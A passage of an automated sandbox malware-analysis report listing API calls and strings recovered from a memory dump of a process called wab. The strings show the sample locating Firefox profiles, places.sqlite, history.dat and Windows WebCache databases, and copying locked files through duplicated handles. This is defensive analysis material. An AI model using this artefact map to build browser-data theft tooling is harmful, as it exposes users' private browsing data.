                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                          • API String ID: 3527940856-3369679110
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                          • API String ID: 3030842498-1896041820
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                          • API String ID: 3249829328-1174173950
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                          • API String ID: 2705122986-2036018995
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                          • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                          • API String ID: 0-1445880494
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1042154641-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2947809556-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                          • API String ID: 3093078384-467022611
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                          Memory Dump Source
